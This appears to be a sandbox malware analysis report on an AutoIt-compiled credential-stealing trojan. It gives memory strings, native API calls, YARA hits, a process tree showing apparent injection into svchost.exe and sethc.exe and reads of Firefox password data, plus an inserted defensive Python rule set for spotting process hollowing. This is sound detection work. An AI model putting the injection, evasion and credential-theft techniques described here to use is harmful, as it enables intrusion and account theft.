                Source: RlKZsaoEJNpD.exe, 00000007.00000002.3780336358.0000000005672000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nicolemichelle.net/4vk9/
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sethc.exe, 00000006.00000002.3778868913.00000000060D2000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000040C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sethc.exe, 00000006.00000002.3778868913.00000000063F6000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000043E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: sethc.exe, 00000006.00000002.3778868913.00000000063F6000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000043E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ik.imgkit.net/u1sv5cu4wfj/cribflyer-photos/tr:w-2000
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=000000
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sethc.exe, 00000006.00000003.1747552982.0000000007E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sethc.exe, 00000006.00000002.3778868913.0000000006588000.00000004.10000000.00040000.00000000.sdmp, sethc.exe, 00000006.00000002.3780779249.0000000007AF0000.00000004.00000800.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000004578000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: sethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.everythlngict.org
                Source: sethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00546B0C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00546D07
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00546B0C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00532B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00532B37

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: This is a third-party compiled AutoIt script.0_2_004F3D19
                Source: ek8LkB2Cgo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ek8LkB2Cgo.exe, 00000000.00000000.1290657620.000000000059E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a9ee6c47-d
                Source: ek8LkB2Cgo.exe, 00000000.00000000.1290657620.000000000059E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: RSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a307d4a8-b
                Source: ek8LkB2Cgo.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_35535821-b
                Source: ek8LkB2Cgo.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f02122d0-7
Source: C:\Windows\SysWOW64\svchost.exe | Code functions (native API calls):
    2_2_0042CCE3 NtClose
    2_2_03272B60 NtClose, LdrInitializeThunk
    2_2_03272DF0 NtQuerySystemInformation, LdrInitializeThunk
    2_2_032735C0 NtCreateMutant, LdrInitializeThunk
    2_2_03274340 NtSetContextThread
    2_2_03274650 NtSuspendThread
    2_2_03272BA0 NtEnumerateValueKey
    2_2_03272B80 NtQueryInformationFile
    2_2_03272BE0 NtQueryValueKey
    2_2_03272BF0 NtAllocateVirtualMemory
    2_2_03272AB0 NtWaitForSingleObject
    2_2_03272AF0 NtWriteFile
    2_2_03272AD0 NtReadFile
    2_2_03272F30 NtCreateSection
    2_2_03272F60 NtCreateProcessEx
    2_2_03272FA0 NtQuerySection
    2_2_03272FB0 NtResumeThread
    2_2_03272F90 NtProtectVirtualMemory
    2_2_03272FE0 NtCreateFile
    2_2_03272E30 NtWriteVirtualMemory
    2_2_03272EA0 NtAdjustPrivilegesToken
    2_2_03272E80 NtReadVirtualMemory
    2_2_03272EE0 NtQueueApcThread
    2_2_03272D30 NtUnmapViewOfSection
    2_2_03272D00 NtSetInformationFile
    2_2_03272D10 NtMapViewOfSection
    2_2_03272DB0 NtEnumerateKey
    2_2_03272DD0 NtDelayExecution
    2_2_03272C00 NtQueryInformationProcess
    2_2_03272C60 NtCreateKey
    2_2_03272C70 NtFreeVirtualMemory
    2_2_03272CA0 NtQueryInformationToken
    2_2_03272CF0 NtOpenProcess
    2_2_03272CC0 NtQueryVirtualMemory
    2_2_03273010 NtOpenDirectoryObject
    2_2_03273090 NtSetValueKey
    2_2_032739B0 NtGetContextThread
    2_2_03273D10 NtOpenProcessToken
    2_2_03273D70 NtOpenThread
Source: C:\Windows\SysWOW64\sethc.exe | Code functions (native API calls):
    6_2_04C34650 NtSuspendThread, LdrInitializeThunk
    6_2_04C34340 NtSetContextThread, LdrInitializeThunk
    6_2_04C32CA0 NtQueryInformationToken, LdrInitializeThunk
    6_2_04C32C60 NtCreateKey, LdrInitializeThunk
    6_2_04C32C70 NtFreeVirtualMemory, LdrInitializeThunk
    6_2_04C32DD0 NtDelayExecution, LdrInitializeThunk
    6_2_04C32DF0 NtQuerySystemInformation, LdrInitializeThunk
    6_2_04C32D10 NtMapViewOfSection, LdrInitializeThunk
    6_2_04C32D30 NtUnmapViewOfSection, LdrInitializeThunk
    6_2_04C32EE0 NtQueueApcThread, LdrInitializeThunk
    6_2_04C32E80 NtReadVirtualMemory, LdrInitializeThunk
    6_2_04C32FE0 NtCreateFile, LdrInitializeThunk
    6_2_04C32FB0 NtResumeThread, LdrInitializeThunk
    6_2_04C32F30 NtCreateSection, LdrInitializeThunk
    6_2_04C32AD0 NtReadFile, LdrInitializeThunk
    6_2_04C32AF0 NtWriteFile, LdrInitializeThunk
    6_2_04C32BE0 NtQueryValueKey, LdrInitializeThunk
    6_2_04C32BF0 NtAllocateVirtualMemory, LdrInitializeThunk
    6_2_04C32BA0 NtEnumerateValueKey, LdrInitializeThunk
    6_2_04C32B60 NtClose, LdrInitializeThunk
    6_2_04C335C0 NtCreateMutant, LdrInitializeThunk
    6_2_04C339B0 NtGetContextThread, LdrInitializeThunk
    6_2_04C32CC0 NtQueryVirtualMemory
    6_2_04C32CF0 NtOpenProcess
    6_2_04C32C00 NtQueryInformationProcess
    6_2_04C32DB0 NtEnumerateKey
    6_2_04C32D00 NtSetInformationFile
    6_2_04C32EA0 NtAdjustPrivilegesToken
    6_2_04C32E30 NtWriteVirtualMemory
    6_2_04C32F90 NtProtectVirtualMemory
    6_2_04C32FA0 NtQuerySection
    6_2_04C32F60 NtCreateProcessEx
    6_2_04C32AB0 NtWaitForSingleObject
    6_2_04C32B80 NtQueryInformationFile
    6_2_04C33090 NtSetValueKey
    6_2_04C33010 NtOpenDirectoryObject
    6_2_04C33D70 NtOpenThread
    6_2_04C33D10 NtOpenProcessToken
    6_2_00CA91B0 NtCreateFile
    6_2_00CA9320 NtReadFile
    6_2_00CA94B0 NtClose
    6_2_00CA9410 NtDeleteFile
    6_2_00CA9610 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code functions:
    0_2_00536606 CreateFileW, DeviceIoControl, CloseHandle
    0_2_0052ACC5 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
    0_2_005379D3 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
    Further code functions (address only):
    0_2_0051B043, 0_2_00503200, 0_2_0052410F, 0_2_005102A4, 0_2_004FE3E3, 0_2_0052038E, 0_2_0052467F, 0_2_005106D9,
    0_2_0055AACE, 0_2_00524BEF, 0_2_0051CCC1, 0_2_004FAF50, 0_2_004F6F07, 0_2_0050B11F, 0_2_0051D1B9, 0_2_005531BC,
    0_2_0052724D, 0_2_0051123A, 0_2_005313CA, 0_2_004F93F0, 0_2_0050F563, 0_2_004F96C0, 0_2_0053B6CC, 0_2_004F77B0,
    0_2_005279C9, 0_2_0050FA57, 0_2_00503B70, 0_2_004F9B60, 0_2_004F7D19, 0_2_0050FE6F, 0_2_00519ED0, 0_2_004F7FA3,
    0_2_015F8988
Source: C:\Windows\SysWOW64\svchost.exe | Code functions (address only):
    2_2_00401BC6, 2_2_00418CD3, 2_2_0040E843, 2_2_0040E839, 2_2_004028AE, 2_2_004028B0, 2_2_0042F2F3, 2_2_00402C28,
    2_2_00402C30, 2_2_004104F3, 2_2_004035C0, 2_2_00416ECE, 2_2_00416ED3, 2_2_0040E6F3, 2_2_00410713, 2_2_032FA352,
    2_2_0324E3F0, 2_2_033003E6, 2_2_032E0274, 2_2_032C02C0, 2_2_03230100, 2_2_032DA118, 2_2_032C8158, 2_2_032F41A2,
    2_2_033001AA, 2_2_032F81CC, 2_2_032D2000, 2_2_03240770, 2_2_03264750, 2_2_0323C7C0, 2_2_0325C6E0, 2_2_03240535,
    2_2_03300591, 2_2_032E4420, 2_2_032F2446, 2_2_032EE4F6, 2_2_032FAB40, 2_2_032F6BD7, 2_2_0323EA80, 2_2_03256962,
    2_2_032429A0, 2_2_0330A9A6, 2_2_0324A840, 2_2_03242840, 2_2_032268B8, 2_2_0326E8F0, 2_2_03282F28, 2_2_03260F30,
    2_2_032E2F30, 2_2_032B4F40, 2_2_032BEFA0, 2_2_0324CFE0, 2_2_03232FC8, 2_2_032FEE26, 2_2_03240E59, 2_2_03252E90,
    2_2_032FCE93, 2_2_032FEEDB, 2_2_0324AD00, 2_2_032DCD1F, 2_2_03258DBF, 2_2_0323ADE0, 2_2_03240C00, 2_2_032E0CB5,
    2_2_03230CF2, 2_2_032F132D, 2_2_0322D34C, 2_2_0328739A, 2_2_032452A0, 2_2_032E12ED, 2_2_0325B2C0, 2_2_0327516C,
    2_2_0322F172, 2_2_0330B16B, 2_2_0324B1B0, 2_2_032F70E9, 2_2_032FF0E0, 2_2_032EF0CC, 2_2_032470C0, 2_2_032FF7B0,
    2_2_03285630, 2_2_032F16CC, 2_2_032F7571, 2_2_032DD5B0, 2_2_032FF43F, 2_2_03231460, 2_2_032FFB76, 2_2_0325FB80,
    2_2_032B5BF0, 2_2_0327DBF9, 2_2_032B3A6C, 2_2_032FFA49, 2_2_032F7A46, 2_2_032DDAAC, 2_2_03285AA0, 2_2_032E1AA3,
    2_2_032EDAC6, 2_2_032D5910, 2_2_03249950, 2_2_0325B950, 2_2_032AD800, 2_2_032438E0, 2_2_032FFF09, 2_2_032FFFB1,
    2_2_03241F92, 2_2_03203FD2, 2_2_03203FD5, 2_2_03249EB0, 2_2_032F7D73, 2_2_03243D40, 2_2_032F1D5A, 2_2_0325FDC0,
    2_2_032B9C32, 2_2_032FFCF2
Source: C:\Windows\SysWOW64\sethc.exe | Code functions (address only):
    6_2_04CAE4F6, 6_2_04CB2446, 6_2_04CA4420, 6_2_04CC0591, 6_2_04C00535, 6_2_04C1C6E0, 6_2_04BFC7C0, 6_2_04C24750,
    6_2_04C00770, 6_2_04C92000, 6_2_04CB81CC, 6_2_04CC01AA, 6_2_04C88158, 6_2_04BF0100, 6_2_04C9A118, 6_2_04C802C0,
    6_2_04CA0274, 6_2_04CC03E6, 6_2_04C0E3F0, 6_2_04CBA352, 6_2_04BF0CF2, 6_2_04CA0CB5, 6_2_04C00C00, 6_2_04BFADE0,
    6_2_04C18DBF, 6_2_04C0AD00, 6_2_04C9CD1F, 6_2_04CBEEDB, 6_2_04C12E90, 6_2_04CBCE93, 6_2_04C00E59, 6_2_04CBEE26,
    6_2_04C0CFE0, 6_2_04C7EFA0, 6_2_04BF2FC8, 6_2_04C74F40, 6_2_04C42F28, 6_2_04C20F30, 6_2_04CA2F30, 6_2_04BE68B8,
    6_2_04C2E8F0, 6_2_04C0A840, 6_2_04C02840, 6_2_04C029A0, 6_2_04CCA9A6, 6_2_04C16962, 6_2_04BFEA80, 6_2_04CB6BD7,
    6_2_04CBAB40, 6_2_04BF1460, 6_2_04CBF43F, 6_2_04C9D5B0, 6_2_04CB7571, 6_2_04CB16CC, 6_2_04CBF7B0, 6_2_04C070C0,
    6_2_04CAF0CC, 6_2_04CB70E9, 6_2_04CBF0E0, 6_2_04C0B1B0, 6_2_04CCB16B, 6_2_04C3516C, 6_2_04BEF172, 6_2_04C1B2C0,
    6_2_04CA12ED, 6_2_04C052A0, 6_2_04C4739A, 6_2_04CB132D, 6_2_04BED34C, 6_2_04CBFCF2, 6_2_04C79C32, 6_2_04C1FDC0,
    6_2_04C03D40, 6_2_04CB1D5A, 6_2_04CB7D73, 6_2_04C09EB0, 6_2_04C01F92, 6_2_04CBFFB1, 6_2_04CBFF09, 6_2_04C038E0,
    6_2_04C6D800, 6_2_04C09950, 6_2_04C1B950, 6_2_04C95910, 6_2_04CADAC6, 6_2_04C45AA0, 6_2_04C9DAAC, 6_2_04CA1AA3,
    6_2_04CBFA49, 6_2_04CB7A46, 6_2_04C73A6C, 6_2_04C75BF0, 6_2_04C3DBF9, 6_2_04C1FB80, 6_2_04CBFB76, 6_2_00C91DD0,
    6_2_00C8CCC0, 6_2_00C8AEC0, 6_2_00C8CEE0, 6_2_00C8B006, 6_2_00C8B010, 6_2_00C954A0, 6_2_00C9369B
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C936A06_2_00C936A0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CABAC06_2_00CABAC0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABE6CE6_2_04ABE6CE
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABD7986_2_04ABD798
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABE2156_2_04ABE215
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABE3346_2_04ABE334
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: String function: 0050EC2F appears 68 times
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: String function: 00516AC0 appears 42 times
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: String function: 0051F8A0 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03287E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0322B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032BF290 appears 105 times
Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 04C7F290 appears 105 times
Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 04C35130 appears 58 times
Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 04BEB970 appears 277 times
Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 04C47E54 appears 102 times
Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 04C6EA12 appears 86 times
Source: ek8LkB2Cgo.exe, 00000000.00000003.1307471416.00000000041A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ek8LkB2Cgo.exe
Source: ek8LkB2Cgo.exe, 00000000.00000003.1309440321.000000000434D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ek8LkB2Cgo.exe
Source: ek8LkB2Cgo.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/13
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0053CE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0052AB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0052B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0053E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00536532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0054C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_004F406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | File created: C:\Users\user~1\AppData\Local\Temp\autC7D8.tmp
Source: ek8LkB2Cgo.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sethc.exe, 00000006.00000002.3776235683.0000000003003000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1751128525.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1748561473.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3776235683.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ek8LkB2Cgo.exe | ReversingLabs: Detection: 73%
Source: unknown | Process created: C:\Users\user\Desktop\ek8LkB2Cgo.exe "C:\Users\user\Desktop\ek8LkB2Cgo.exe"
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ek8LkB2Cgo.exe"
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Process created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"
Source: C:\Windows\SysWOW64\sethc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
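The process rows above carry the security-relevant point of this report: two Windows system binaries are started by parents outside the Windows directory, and svchost.exe runs with a command line that names the original sample rather than itself, which is what a child created suspended with a foreign command line and then overwritten in memory looks like. The parent of sethc.exe, RlKZsaoEJNpD.exe, is identified further down this page by its debug path as Joe Security's FakeChrome decoy. The following Python is an added example, not code from the report or from the sample: the events are constructed from the four "Process created" rows above, and the rule names, the command-line parser and the directory lists are the editor's assumptions.

```python
import ntpath

# Constructed from the "Process created" rows of this report: parent, image on disk, command line.
EVENTS = [
    {"parent": None,
     "image": r"C:\Users\user\Desktop\ek8LkB2Cgo.exe",
     "cmdline": r'"C:\Users\user\Desktop\ek8LkB2Cgo.exe"'},
    {"parent": r"C:\Users\user\Desktop\ek8LkB2Cgo.exe",
     "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\ek8LkB2Cgo.exe"'},
    {"parent": r"C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe",
     "image": r"C:\Windows\SysWOW64\sethc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\sethc.exe"'},
    {"parent": r"C:\Windows\SysWOW64\sethc.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
]

# Directory lists are assumptions; tune them for the estate being monitored.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
WINDOWS_DIR = "c:\\windows\\"


def argv0(cmdline):
    """Program token of a Windows command line: the quoted path when the line
    starts with a double quote, otherwise the first whitespace-delimited token."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def hollowing_candidates(events):
    """Rule 1: the executable on disk and the program named in argv[0] differ.
    On this page svchost.exe runs with ek8LkB2Cgo.exe's command line."""
    return [ev["image"] for ev in events
            if ntpath.basename(ev["image"]).lower()
            != ntpath.basename(argv0(ev["cmdline"])).lower()]


def system_binary_odd_parent(events):
    """Rule 2: a System32/SysWOW64 binary whose parent lives outside the
    Windows directory (svchost.exe from the Desktop, sethc.exe from Program Files)."""
    hits = []
    for ev in events:
        parent = ev["parent"]
        if parent is None:
            continue
        if (ev["image"].lower().startswith(SYSTEM_DIRS)
                and not parent.lower().startswith(WINDOWS_DIR)):
            hits.append((parent, ev["image"]))
    return hits


if __name__ == "__main__":
    for image in hollowing_candidates(EVENTS):
        print("image/command-line mismatch:", image)
    for parent, image in system_binary_odd_parent(EVENTS):
        print("system binary with non-Windows parent:", image, "<-", ntpath.basename(parent))
```

Rule 1 is the stronger of the two: a legitimate service host never carries another program's path in its own command line, so this check is low-noise in production telemetry (Sysmon event 1 or the equivalent EDR record exposes both fields). Rule 2 needs an allowlist of installers and management agents that legitimately spawn system binaries.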
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: wsock32.dll
